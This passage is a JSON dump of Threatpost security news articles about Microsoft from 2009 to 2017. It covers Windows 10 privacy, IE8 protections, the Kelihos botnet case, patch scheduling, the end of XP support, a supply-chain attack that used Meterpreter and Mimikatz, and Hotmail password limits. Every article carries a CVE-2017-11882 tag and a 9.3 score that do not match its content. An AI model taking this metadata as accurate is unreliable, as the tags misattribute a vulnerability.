the Windows 10 upgrade app. \u201cSpecifically, when prompted with a Windows 10 update, if the user chose to decline it by hitting the \u2018X\u2019 in the upper right hand corner, Microsoft interpreted that as consent to download Windows 10,\u201d Kalia wrote.\n\nThe EFF also asserts that with the introduction of the Cortana digital assistant, a feature introduced with Windows 10, Microsoft demonstrated another disturbing behavior pattern and disregarded user privacy under the guise of Cortana customization.\n\n\u201cWindows 10 sends an unprecedented amount of usage data back to Microsoft,\u201d Kalia maintains, including location data, text input, voice input, touch input, webpages you visit, and telemetry data regarding your general usage of your computer, including which programs you run and for how long.\n\nOf course users can disable data sharing features that limit the amount of personal information Microsoft collects. However, the EFF says even those who opt out of sharing data within Windows 10 still can\u2019t escape sharing some data with Microsoft via the operating system\u2019s telemetry reporting.\n\nWindows 10 telemetry, also known as the Universal Telemetry Client (UTC), is \u201csystem data that is uploaded by the Connected User Experience and Telemetry component.\u201d Information shared with Microsoft via UTC includes system uptime and crash data and hardware attributes such as CPU, installed memory, and storage, according to [Windows experts Ed Bott](<http://www.zdnet.com/article/windows-10-telemetry-secrets/>) who has written extensively about Windows 10 telemetry.\n\nUTC can collect personal data as part of a crash report when specific files are the cause of the system failure. Users of Windows 10 Enterprise Edition can turn telemetry data sharing off, but Home and Pro users can\u2019t, the EFF maintains.\n\n\u201cThere\u2019s no doubt that Windows 10 has some great security improvements over previous versions of the operating system. But it\u2019s a shame that Microsoft made users choose between having privacy and security,\u201d Kalia said.\n", "cvss3": {}, "published": "2016-08-18T16:38:30", "type": "threatpost", "title": "EFF Blasts Microsoft Over Windows 10 Rollout", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-08-19T17:00:44", "id": "THREATPOST:392CE26C2E3587A54C58FBEC0E26729F", "href": "https://threatpost.com/eff-blasts-microsoft-over-malicious-windows-10-rollout-tactics/120006/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:24", "description": "[](<https://threatpost.com/ie8-security-stops-memory-bypass-attacks-032609/>)\n\nWhen Mark Dowd and Alex Sotirov demonstrated a technique for [bypassing Vista\u2019s memory protections](<http://taossa.com/archive/bh08sotirovdowd.pdf>) at Black Hat last year, the security community was stunned. Microsoft officials said at the time they were working on ways to defeat the pair\u2019s attack and now that protection has arrived, in the form of Internet Explorer 8.\n\nDowd (above, right), who works for IBM ISS in Australia, says in a blog post that the improvements that Microsoft has made in the [security of IE 8](<http://blogs.iss.net/archive/chicksdigIE8.html>) have the effect of preventing the memory-bypass attacks from working.\n\n\u201cBasically, the fix is simple: Loading .NET controls has been associated with a special privilege that users can enable or disable \u2013 and in the default configuration for the \u201cInternet Zone\u201d (the Medium-High setting), .NET controls have been disabled,\u201d Dowd writes.\n\nThe attack that Dowd and Sotirov (above, left) showed off at Black Hat was complex, but the basic premise is that they were able to load a .Net control onto a Web page into a location of their choosing, and with whatever permissions they chose. This allowed them to get around two of the main memory protections in Windows Vista, ASLR (Address Space Layout Randomization) and DEP (Data Execution Prevention). These two technologies are a major part of the security upgrades that Microsoft added to Vista, and Dowd and Sotirov\u2019s attack was seen as a breakthrough.\n\nBut now, with the addition of the new permission to IE 8, Microsoft has put a stop to that particular attack. As [Jonathan Ness](<http://blogs.technet.com/srd/archive/2009/03/23/released-build-of-internet-explorer-8-blocks-dowd-sotirov-aslr-dep-net-bypass.aspx>) of the Microsoft Security Response Center writes in his blog on IE 8 security, \u201cThe final release of Internet Explorer 8 on Windows Vista blocks the .NET DEP+ASLR bypass mechanism from malicious websites on the Internet. Specifically, IE8 created a new URLAction that regulates loading of the .NET MIME filter. By default, the URLAction prevents it from loading in the Internet and Restricted Sites Zones. The .NET MIME filter is allowed to load by default in the Intranet Zone.\u201d \n\n\n\nThis is a nice advance for Microsoft and for its customers. IE for years has been seen as by far the least secure of the major browsers, but that perception may be shifting now. At last week\u2019s CanSecWest conference, the hackers in the Pwn2Own contest went right after Safari, believing that IE 8 on Vista was too tough to crack. It eventually went down, surprising many of the researchers in attendance.\n\nThis is all to the good, as Dowd writes.\n\n\u201cSo, the net effect (no pun intended) of this change is that by default, our technique will no longer work in its current form against IE8 browsers in their default configuration. There are also a number of other security enhancements in IE8,\u201d he writes. \u201cMost notably, the browser now runs in \u2018Protected Mode.\u2019 Essentially, this means that the browsing process runs in a sandbox of sorts with a restricted set of privileges. (Internally, this is implemented by utilizing Vista\u2019s \u2018Low Integrity\u2019 mode and communicating to a broker process via an out of process COM server. But, that is the topic of another post.) Furthermore, DEP has been enabled in IE8, which is a big change from IE7. This means that IE8 now fully reaps the benefits of the Vista memory protections. Hacking it is going to be hard! .. Probably!\u201d\n", "cvss3": {}, "published": "2009-03-26T18:27:42", "type": "threatpost", "title": "IE8 security stops memory bypass attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:25", "id": "THREATPOST:17ABCE7BEBAC56FCA5601686C9601728", "href": "https://threatpost.com/ie8-security-stops-memory-bypass-attacks-032609/72537/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:02", "description": "[](<https://threatpost.com/microsoft-settles-kelihos-botnet-defendant-says-he-didnt-run-network-101912/>)Microsoft on Friday said it has reached a settlement with a Russian programmer it named as a defendant in a lawsuit related to the operation of the notorious [Kelihos botnet](<https://threatpost.com/botnet-shutdown-success-story-how-kaspersky-lab-disabled-hluxkelihos-botnet-092911/>). The company said that it no longer believes Andrey N. Sabelnikov was the operator of the botnet, but was instead responsible for writing some code that was later used by the botnet.\n\nThis is a departure from the company\u2019s earlier statements, which painted Sabelnikov as someone \u201cresponsible for the operations of the Kelihos botnet.\u201d After working with researchers at Kaspersky Lab and other organizations to take down the Kelihos bothet in the autumn of 2011, Microsoft amended its original complaint to include Sabelnikov as a defendant. The company alleged in a complaint filed in U.S. District Court in January that not only did Sabelnikov [write some of the Kelihos code](<https://threatpost.com/microsoft-adds-kelihos-botnet-operator-civil-complaint-012412/>), but he helped run the botnet.\n\n\u201cIn today\u2019s complaint, Microsoft presented evidence to the court that Mr. Sabelnikov wrote the code for and either created, or participated in creating, the Kelihos malware. Further, the complaint alleges that he used the malware to control, operate, maintain and grow the Kelihos botnet. These allegations are based on evidence Microsoft investigators uncovered while analyzing the Kelihos malware. Microsoft also alleges that Mr. Sabelnikov registered more than 3,700 \u2018cz.cc\u2019 subdomains from Mr. Piatti and dotFREE Group SRO, and misused those subdomains to operate and control the Kelihos botnet,\u201d Richard Boscovich, a senior staff attorney in the Microsoft Digital Crimes Unit, wrote in a [blog post at the time](<https://blogs.technet.com/b/microsoft_blog/archive/2012/01/23/microsoft-names-new-defendant-in-kelihos-case.aspx?Redirected=true>). \n\nNow, Microsoft is taking a somewhat different tack. Rather than accusing Sabelnikov of running the Kelihos botnet, the company [released a statement](<https://blogs.technet.com/b/microsoft_blog/archive/2012/10/19/microsoft-reaches-settlement-with-second-kelihos-defendant.aspx?Redirected=true>) saying that he merely wrote some of the malware\u2019s code. As a result, the company and the programmer reached an undisclosed out-of-court settlement.\n\n\u201cMicrosoft and St. Petersburg software programmer Andrey Sabelnikov have entered into a Settlement Agreement in the matter of Microsoft v. Sabelnikov. During the negotiations, after reviewing the evidence provided by Microsoft and engaging in discussions, the parties have come to an understanding that Mr. Sabelnikov wrote code that was used in the Kelihos botnet code, but the programmer is not the operator of the botnet or involved in its activities. After a review and understanding of all of the details of the case, the parties were able to enter into a confidential settlement agreement in this matter, which resolves the dispute between the parties,\u201d Boscovich wrote on Friday.\n\nMicrosoft has been quite aggressive in its efforts to disrupt and take down botnets in the last couple of years, using both technical and legal tactics to knock the networks offline. The company has gone after several different botnets, with varying degrees of fervor and success, but the Kelihos operation was the first time that Microsoft had named any individuals as defendants in its legal complaints. Until then it had focused on hosting providers or other corporate entities allegedly involved in botnet operations.\n", "cvss3": {}, "published": "2012-10-19T19:01:33", "type": "threatpost", "title": "Microsoft Settles With Kelihos Botnet Defendant, Says He Didn't Run the Network", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:21", "id": "THREATPOST:DCEC8DA2CC98CD3F9DF8B10773BD6F01", "href": "https://threatpost.com/microsoft-settles-kelihos-botnet-defendant-says-he-didnt-run-network-101912/77135/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:55", "description": "Scheduled patch deliveries are so last decade\u2014and thankfully, it looks like they\u2019re over when it comes to [Microsoft Patch Tuesday](<https://threatpost.com/creaking-patch-tuesdays-viability-rests-with-quality-speed/110941>).\n\nMicrosoft this week at its Ignite event introduced its new security update scheme called [Windows Update for Business](<http://blogs.windows.com/bloggingwindows/2015/05/04/announcing-windows-update-for-business/>), which debuts in Windows 10 with several new features that help IT departments take better control of patch deployments and prioritization. For consumers and businesses not running Windows Pro or Windows Enterprise devices where the service is free, the second-Tuesday-of-every-month procession of updates is over.\n\n\u201cWe\u2019re not going to be delivering all of these updates to all of these consumers on one day of the month,\u201d said Terry Myerson, executive vice president of operating systems at Microsoft.\n\nAnd with that declaration, Patch Tuesday\u2019s 12-year run is essentially done. Companies that have structured all-hands-on-deck patch rollouts will now get patches\u2014and new functionality features\u2014as they\u2019re available. Windows of exposure to attacks against unpatched vulnerabilities close a little tighter. The applause given to Myerson during his keynote at Ignite was likely echoed in server rooms worldwide.\n\nFor Windows Update for Business users, patch rollouts will look different. Distribution rings allow Windows admins to designate which machines get updates on a quicker cycle\u2014think remote offices and workers. Admins can also designate maintenance windows for certain machines, and integrate the update mechanism into existing system management tools.\n\n\u201cConsumers will want to be on one of the faster-moving tiers. They may not want to be part of the \u2018ludicrous\u2019 tier, but these users will want faster adoption of new features and user experience changes,\u201d said Chris Goettl of Shavlik, a longtime patch management firm. \u201cWith this change, businesses will actually be able to take advantage of all tiers. An IT organization with a desire to vet out new updates before they reach the bulk of their user base can put a test group on the \u2018ludicrous\u2019 tier. That way they can get a feel for the changes coming, the stability of those changes and potentially block any of those updates that have a negative effect.\u201d\n\nMicrosoft said it will offer what it\u2019s calling Long Term Servicing Branches, which offer only security updates to machines on that tier, similar to Patch Tuesday updates as currently structured.\n\n\u201cWith these changes, the power of Patch Tuesday will diminish rapidly,\u201d Goettl said.\n\nIt\u2019s no secret Microsoft has had an interesting few months with regard to patching. First there was an internal restructuring under new CEO Satya Nadella that resulted in 2,100 layoffs and the integration of the [Trustworthy Computing group](<https://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404>) into Microsoft\u2019s enterprise and cloud computing organizations. In the subsequent months since the September 2014 shakeup, [patch quality](<https://threatpost.com/issues-arise-with-ms14-066-schannel-patch/109385>) has been an issue with a couple of important fixes pulled back, and other publicly disclosed and exploited vulnerabilities sitting unpatched for a nerve-racking period of time. And not to mention, Microsoft\u2019s decision to discontinue [Advanced Notification of patches](<https://threatpost.com/microsoft-limits-advanced-patch-notifications-to-premier-customers/110294>) on the Thursday prior to Patch Tuesday, leaving it available only to premier support customers.\n\nNow that the dust has settled in Redmond, it\u2019s clear that the plan was to give Patch Tuesday a facelift. For consumers who are indifferent about security updates, this assures a fleet of devices running at current patch levels on a timely basis. For businesses, more choice and control is always welcome.\n\n\u201cSome people want the software right after it finishes our testing,\u201d Microsoft\u2019s Myerson said. \u201cThey don\u2019t want to wait a second. Then we have people step back and say they\u2019ll wait until we work out the kinks make sure there are no compatibility issues, no functionality issues. Great, we let the user choose. With this, we have confidence that we have the highest quality patches testing them with an incredibly broad population.\u201d\n\nSlow-moving enterprises, meanwhile, are likely to stick to their current change and configuration management processes for the time being. Some companies just cannot afford the downtime and reliability issues caused by a patch breaking other applications, or updates requiring a reboot to take affect during business hours.\n\n\u201cImagine the referential integrity issues with some machines accepting patches and others not based on reboots, when services can be restarted, or even if they are offline,\u201d said Morey Haber, vice president of technology at Beyond Trust. \u201cBusinesses would no longer have a controlled baseline to measure against when patches are being streamed versus a firm bulk release by date.\u201d\n\nHowever, with the speed at which vulnerabilities are being found by white and black hats\u2014and disclosed\u2014organizations can no longer afford to sit tight for three to four weeks, or months waiting for a patch. The speed at which attacks are folded into exploit kits should give pause to any critic of automatic rollouts.\n\n\u201cLarge enterprises are always slower moving to the adoption of new concepts and risk, especially with IT. The argument for the other side is what if I could cut a third of my patching costs if I don\u2019t have to patch all the time?\u201d Andrew Storms, VP of security services at New Context, told Threatpost in February. \u201cIf I were a CIO, I would be drooling.\u201d\n\nMicrosoft would not answer questions for this article, instead provided this statement: \u201cWindows Update for Business can take responsibility for the timely distribution of security updates for customers for free. Customers that choose to distribute updates themselves will continue to receive the updates on the second Tuesday of the month.\u201d_ _\n\n_This article was updated to include a comment from Microsoft._\n", "cvss3": {}, "published": "2015-05-06T13:10:24", "type": "threatpost", "title": "Windows Update for Business Uproots Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-05-08T19:58:48", "id": "THREATPOST:580280FBECF50DF8FF68F3A998F311D3", "href": "https://threatpost.com/patch-tuesday-facelift-end-of-an-era/112640/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:10", "description": "Late last week it emerged that Microsoft had searched through the contents of a French blogger\u2019s Hotmail account in order to track down the source of a leak of proprietary information from the Redmond, Wash., tech giant.\n\nThe Electronic Frontier Foundation and transparency advocates have expressed stark disapproval of the entire situation. The EFF is even suggesting that Microsoft\u2019s actions here constitute[ a direct violation of the Electronic Communications Privacy Act](<https://www.eff.org/deeplinks/2014/03/microsoft-says-come-back-warrant-unless-youre-microsoft>) (ECPA).\n\nThe saga began when a Microsoft employee named Alex Kibkalo allegedly stole protected information pertaining to Microsoft\u2019s Activation Server Software Developer\u2019s Kit (SDK) and emailed it \u2013 via Hotmail, which is owned and operated by Microsoft \u2013 to a French blogger.\n\nAround August 2012, Microsoft became aware that someone had leaked the SDK after the blogger in question \u2013 who is not named in the criminal complaint filed against Kibkalo in September 2012 \u2013 began posting screenshots of unreleased Windows operating system features. Microsoft\u2019s Trustworthy Computing Investigations (TWCI), the division of the company tasked with protecting it against both external and internal threats, launched an investigation accordingly.\n\nIn early September 2012, an unnamed person contacted former president of the Windows Division of Microsoft, Steven Sinofsky. This source had been contacted by the blogger in order to confirm that the code he had received was in fact proprietary Microsoft code. In an interview with the TWCI, the source indicated that the blogger had contacted the source via Hotmail.\n\nAccording to the complaint (which was acquired by the [Register](<http://regmedia.co.uk/2014/03/20/kibkalo-complaint.pdf>)), \u201cAfter confirmation that the data was Microsoft\u2019s proprietary trade secret, on September 7, 2012 Microsoft\u2019s Office of Legal Compliance (OLC) approved content pulls of the blogger\u2019s Hotmail account.\u201d\n\nUpon examining the contents of the blogger\u2019s email account, Microsoft found Kibkalo\u2019s correspondence with the blogger. The company then provided all of this information to the FBI, who then arrested Kibkalo and charged him with the theft of trade secrets.\n\nMicrosoft published a response to the emergence of these facts, noting that it would make certain changes to its policies, but ultimately defending its right to search the contents of its users\u2019 communication without legal oversight.\n\n\u201cCourts do not, however, issue orders authorizing someone to search themselves, since obviously no such order is needed,\u201d wrote John Frank, deputy general counsel and vice president of legal and corporate affairs. \u201cSo even when we believe we have probable cause, there\u2019s not an applicable court process for an investigation such as this one relating to the information stored on servers located on our own premises.\u201d\n\nFrank goes on to claim that the company acted within its terms of service by conducting \u201ca limited review of this third party\u2019s Microsoft operated accounts,\u201d which the company only undertakes in \u201cthe most exceptional circumstances\u201d after \u201c[applying] a rigorous process before reviewing such content.\u201d\n\nFrank also notes the company\u2019s understanding of public concern regarding their actions, and thus, the company says it will adhere to the following policies moving forward:\n\n * Microsoft will not conduct a search of customer email and other services unless the circumstances would justify a court order, if one were available.\n * To ensure compliance with the standards applicable to obtaining a court order, Microsoft will rely in the first instance on a legal team separate from the internal investigating team to assess the evidence. It will move forward only if that team concludes there is evidence of a crime that would be sufficient to justify a court order, if one were applicable. As a new and additional step, the company will then submit this evidence to an outside attorney who is a former federal judge. It will conduct such a search only if this former judge similarly concludes that there is evidence sufficient for a court order.\n * Even when such a search takes place, it is important that it be confined to the matter under investigation and not search for other information. Microsoft says it will continue to ensure that the search itself is conducted in a proper manner, with supervision by counsel for this purpose.\n * Finally, the company believes it is appropriate to ensure transparency of these types of searches, just as it is for searches that are conducted in response to governmental or court orders. The company therefore will publish as part of its bi-annual [transparency report](<https://threatpost.com/microsoft-transparency-report-shows-company-supplied-user-content-22-cases-032113/77653>) the data on the number of these searches that have been conducted and the number of customer accounts that have been affected.\n\n\u201cUnfortunately, this new policy just doubles down on the Microsoft\u2019s indefensible and tone-deaf actions in the Kibkalo case,\u201d says EFF legal fellow, Andrew Crocker. \u201cIt begins with a false premise that courts do not issue orders in these circumstances because Microsoft was searching \u2018itself,\u2019 rather than the contents of its user\u2019s email on servers it controlled.\u201d\n\nHad the company believed it had probable cause to search one of its users\u2019 Hotmail accounts, Crocker continues, Microsoft could have easily presented its case to the FBI and acquired a proper search warrant.\n\n\u201cTo be sure, the process described in Microsoft\u2019s statement bears more than a passing resemblance to a standard criminal investigation, with a prosecutorial team building a case and then presenting it to an ostensibly neutral third party, a retired federal judge no less,\u201d Crocker writes. \u201cLet\u2019s call it Warrants for Windows!\u201d\n\nCrocker admits that while this search may have revealed criminal activity, it was also conducted in Microsoft\u2019s own self-interest, and, therefore, sets an extremely dangerous precedent.\n", "cvss3": {}, "published": "2014-03-24T12:55:29", "type": "threatpost", "title": "Microsoft Reads User Email without Warrant", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-03-24T16:55:29", "id": "THREATPOST:75108516B2230B2FA175C2B84083F4DF", "href": "https://threatpost.com/critics-upset-as-microsoft-conducts-email-search-in-leak-investigation/104969/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:05", "description": "For those of you anticipating the start of a Walking Dead-style malware apocalypse next Tuesday, calm yourselves.\n\nThe official end of security support for Windows XP is upon us, but it\u2019s important to check some anxiety at the door and keep some perspective.\n\n\u201cI\u2019ve been a forensics investigator 14 years and in my experience, I don\u2019t know I\u2019ve come across one incident, or very few anyway, where a vulnerability was exploited where an unpatched system wasn\u2019t the source of a breach,\u201d said Christopher Pogue, director at Trustwave. Pogue said breaches are much more likely to be blamed on poor passwords, weak access control systems or a poorly configured firewall and a glaring hole in the underlying operating system.\n\n\u201cAll the administration stuff in place around these systems falls down. Attackers leverage that because they want the path of least resistance,\u201d Pogue said. \u201cYou have to presume that before they get their exploit on an unpatched XP machine, they have to breach the environment, bypass firewalls get to the system, pivot to the unpatched system and hope it has critical data on it so they can run exploit code. There are a whole lot of items that have to line up for that to happen.\u201d\n\nThe hype and hyperbole around April 8, the latest in a long line of security Doomsdays, is rooted in theories that because a good number of XP systems remain in use storing data and processing transactions, that any previously unreported XP vulnerabilities will be perpetual zero-days. The theory continues that attackers have been building and hording XP exploits, anxiously wringing their hands waiting for April 8, 2014 to come and go.\n\nNow to dismiss all of that as FUD is foolhardy; some attackers who do have [XP exploits that will be zero days](<http://threatpost.com/microsoft-to-fix-word-zero-day-with-final-xp-patch/105241>) in a matter of five days are going to wait. Others are less patient (see the recent [XP Rich Text Format zero day](<http://threatpost.com/targeted-attacks-exploit-microsoft-word-zero-day/104980>) that will be patched on Tuesday). And for those smaller organizations with fewer IT resources that may still be running XP machines that still hum along carrying out their mission day after day, their risk posture will be slouching a little more come Tuesday.\n\nBig picture, however, people are moving off of XP. Qualys CTO Wolfgang Kandek published some numbers based off the company\u2019s flagship vulnerability scanning service that indicate the XP installed base had dipped to below 15 percent, down from 35 percent 14 months ago. Migrations in the transportation and health care industries are much more dramatic, he said.\n\n\u201cThese are two extremes, but all industries are showing a downward slope (migrating off XP); none are stagnant,\u201d Kandek said.\n\nKandek is in the camp that attackers will intensify their targeting of XP machines and in particular will look at patches for modern Windows 7 and 8 systems and determine whether those vulnerabilities could be present in no-longer supported XP machines. He also urges organizations that must use XP to isolate those machines off the network, keep them for a specialized purpose and keep them offline.\n\n\u201cIn May, Microsoft will publish bulletins and patches, and those can be taken by a hacker and reverse-engineered. They will ask \u2018What does fix?\u2019 And once they know what it does on Windows 7 or 8, that it changes a DLL or fixes an overflow, they could go into XP and figure out whether the same DLL exist or overflow vulnerability exists,\u201d Kandek said. \u201cPatches map to vulnerabilities that could be in XP. Sometimes they\u2019re only in a new component of Windows 7, but most of the time you can find those vulnerabilities in XP.\u201d\n\nKandek said that roughly 70 percent of vulnerabilities that were patched in 2013 were found in Windows 8 through XP.\n\n\u201cI don\u2019t see why that would stop in May, June or July. Attackers can use that knowledge as pointer into XP to find if a vulnerability exists. It\u2019s an accelerator for them. My feeling is that after two or three months, there will be tools in public that reliably exploit XP. I can definitely see how that would make an attacker\u2019s work much easier.\u201d\n\nA key difference to point out, however, is that Windows 7 and 8, for example, are radically different under the hood than XP. Microsoft has invested time and money into building mitigations for a number of dangerous memory-based attacks. Technologies such as ASLR and DEP make it much more challenging and costly for an attacker to execute malicious code against vulnerabilities in the operating system. Looking for bugs in XP that live in Windows 7 or 8 just may not be the best use of resources for an attacker.\n\n\u201cAn attacker has always chose the path of least resistance to gain access to a system; they don\u2019t have to exploit the operating system, and for the most part, haven\u2019t,\u201d Trustwave\u2019s Pogue said. \u201cWhile it\u2019s still possible, if I were a small business owner and running XP to store and process data, I\u2019d be concerned about it and take steps run and updated and patched operating system. Even so, it\u2019s important to remember that\u2019s not a silver bullet. Updating to Windows 7 doesn\u2019t mean you\u2019re necessarily safe. You have to build up defense-in-depth mechanisms. XP has been updated and patched up to now, and I\u2019ve investigated thousands of breaches on XP systems. An updated OS does not always equal security.\u201d\n", "cvss3": {}, "published": "2014-04-04T12:13:55", "type": "threatpost", "title": "Windows XP End of Life Breeding FUD, Legit Concerns", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-04-07T17:28:37", "id": "THREATPOST:1FDD4D6EFB350CC9F6F42A5514AA6849", "href": "https://threatpost.com/windows-xp-end-of-life-breeding-equal-parts-fud-legit-concerns/105252/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:18", "description": "In the year and a half since we first launched Threatpost, the site has grown very quickly, probably more quickly than any of us had even hoped it might. We\u2019ve added a couple of regular podcasts, original videos, developed a stable of terrific regular contributors and recently launched our first on-demand video event. And now we\u2019re making a major addition to our editorial staff.\n\nI\u2019m very excited and proud to announce that Paul Roberts is bringing his talents to Threatpost. Paul is a well-known personality in the security community, having started out covering security for the IDG News Service before moving to eWeek magazine, where he and I worked together for several years. Paul then moved on to InfoWorld before spending the last few years as an analyst at The 451 Group.\n\nPaul has a wealth of experience in the security industry and brings a strong background in both journalism and analysis to the Threatpost staff. He\u2019ll be writing news and analysis pieces, bringing his sharp analytical eye and deep knowledge of the industry to bear. Look for in-depth features and news coverage from Paul as he gets his feet under him. Paul\u2019s a terrific addition to our staff, which will still include Ryan Naraine and me and our regular set of contributors, so we\u2019re very excited for this next evolution of Threatpost.\n\nHang on, because it\u2019ll be a fun ride.\n", "cvss3": {}, "published": "2010-08-02T04:44:19", "type": "threatpost", "title": "Paul Roberts Joins Threatpost", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:18:35", "id": "THREATPOST:5679ACC257BEC35A3A300F76FA78E8E6", "href": "https://threatpost.com/paul-roberts-joins-threatpost-080210/74279/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:44", "description": "Microsoft said a recent attack it calls [Operation WilySupply](<https://blogs.technet.microsoft.com/mmpc/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/>) utilized the update mechanism of an unnamed software editing tool to infect targets in the finance and payment industries with in-memory malware.\n\nThe unnamed editing tool was used to send unsigned malicious updates to users in targeted attacks, according to a report published Thursday.\n\n\u201cWhile their software supply chain served as a channel for attacking other organizations, they themselves were also under attack,\u201d said Elia Florio, senior security software engineer, with Windows Defender ATP Research Team.\n\nIt\u2019s unclear just how many affected parties there were and when the attacks took place. However, Florio said the attacks were selective and purposely went after only the \u201cmost valuable targets\u201d in an effort to avoid detection.\n\n\u201cWe believe that the activity group behind Operation WilySupply is motivated by financial gain. They compromise third-party software packages delivered through updaters and other channels to reach victims who are mostly in the finance and payment industries,\u201d Florio wrote.\n\nHe said Microsoft began investigating the suspicious activity after computers using the updater were red-flagged by Windows ATP. \u201cWindows Defender ATP initially called our attention to alerts flagging suspicious PowerShell scripts, self-deletion of executables, and other suspect activities,\u201d Florio wrote.\n\nA forensic analysis of the _Temp Folder _on one of the targeted systems revealed the legitimate third-party updater running as service. However, closer inspection revealed the updater also had downloaded an unsigned, low-prevalence executable just before the malicious activity was observed, according to Florio.\n\n\u201cThe downloaded executable turned out to be a malicious binary (Rivit) that launched PowerShell scripts bundled with the Meterpreter reverse shell, which granted the remote attacker silent control,\u201d Florio wrote. \u201cThe malware binary, named by the cybercriminals _ue.exe_, was a small piece of code with the sole purpose of launching a Meterpreter shell.\u201d\n\nMeterpreter is a legitimate pen-testing tool packaged with the Metasploit framework and can be used to carry out in-memory or fileless attacks. Meterpreter attaches itself to a process and is capable of carrying out in-memory DLL injections. It\u2019s one of several open-source tools such as Lazagne that allow attackers to probe deeper into targeted systems, steal credentials and open reverse shells back to the adversary\u2019s control server. In-memory or fileless attacks, Florio said, are a [fast growing trend among cybercriminals](<https://threatpost.com/hard-target-fileless-malware/125054/>).\n\nAttackers, Florio said, were taking advantage of the trusted relationship within the context of the software supply chain. The victims were unaware that a malicious third-part had infiltrated the remote update channel of the supply chain.\n\nSelf-updating software has been targeted in the past on a number of occasions, points out Microsoft. Unrelated incidents include adversaries targeting Altair Technologies\u2019 EvLog update process, the auto-update mechanism for South Korean software SimDisk and the update server used by ESTsoft\u2019s ALZip compression application, according to researchers.\n\nNoteworthy to the attack was the fact adversaries conducted advanced recon that included qualifying systems with tools such as .NET, IPCONFIG, NETSTAT, NLTEST, and WHOAMI, Florio said.\n\nAdditional techniques, tactics and procedures Florio noted included; memory-only payloads assisted by PowerShell and Meterpreter running in rundll32; Migration into long-living processes, such as the Windows Printer Spooler or _spoolsv_._exe_; use of common tools like Mimikatz and Kerberoast to dump hashes; ateral movement using Windows Management Instrumentation (WMI), specifically the _WMIC /node_ command; and persistence through scheduled tasks created using SCHTASKS and AT commands.\n\nTips on protection from such attacks include hardening defenses with strong encryption used in update channels, putting script and configuration files in signed containers and adopting Security Development Lifecycle best practices, according to Florio.\n", "cvss3": {}, "published": "2017-05-05T14:11:31", "type": "threatpost", "title": "Supply Chain Update Software Unknowingly Used in Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-05-05T18:11:31", "id": "THREATPOST:3AADA643D0F6F1FA8E04B9E2C9F0354B", "href": "https://threatpost.com/supply-chain-update-software-unknowingly-used-in-attacks/125483/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:13", "description": "[](<https://threatpost.com/hotmail-limits-passwords-16-characters-092112/>)Passwords, unfortunately, still are the main authentication mechanism on most Web sites, including all of the popular webmail services, such as Hotmail, Gmail and Yahoo Mail. Many sites encourage users to pick complex and long passwords, so it\u2019s surprising to see that Microsoft now has limited Hotmail passwords to no more than 16 characters. Even more surprising, however, is that Hotmail will accept the first 16 characters of an existing, longer password, indicating that the company may have been storing users\u2019 passwords in plaintext.\n\nMicrosoft officials say that there has been a 16-character limit for Hotmail accounts for some time. But security researchers who looked at the requirement found it odd, to say the least. Sixteen characters is a somewhat arbitrary limit, but the more interesting bit is why Microsoft chose to make the change at all.\n\nThe real question, however, is what the implications of the change are. As [Costin Raiu](<https://www.securelist.com/en/blog/208193844/Hotmail_Your_password_was_too_long_so_we_fixed_it_for_you>), head of Kaspersky Lab\u2019s GReAT research team, wrote in an analysis of the issue, one possibility is that Microsoft has been truncating longer passwords to 16 characters all along and then hashing those first 16 characters. The other possibility is somewhat more troubling.\n\n\u201cMy previous password has been around 30 chars in size and now, it doesn\u2019t work anymore. However, I could login by typing just the first 16 chars,\u201d he wrote.\n\n\u201cTo pull this trick with older passwords, Microsoft had two choices:\n\n* store full plaintext passwords in their db; compare the first 16 chars only \n* calculate the hash only on the first 16; ignore the rest\n\nStoring plaintext passwords for online services is a definite no-no in security. The other choice could mean that since its inception, Hotmail was silently using only the first 16 chars of the password. To be honest, I\u2019m not sure which one is worse.\u201d\n\nMicrosoft officials did not respond to questions on this issue.\n\nIn order to keep passwords safe from snooping, many Web sites run users\u2019 plaintext passwords through a hash function, which obscures them. Depending upon which hash function is being used, and what kind of computers is used to do the cracking, the length of time needed to crack a password hash can vary greatly. \n\n\u201cPlease note our research has shown uniqueness is more important than length and (like all major account systems) we see criminals attempt to victimize our customers in various ways; however, while we agree that in general longer is better, we\u2019ve found the 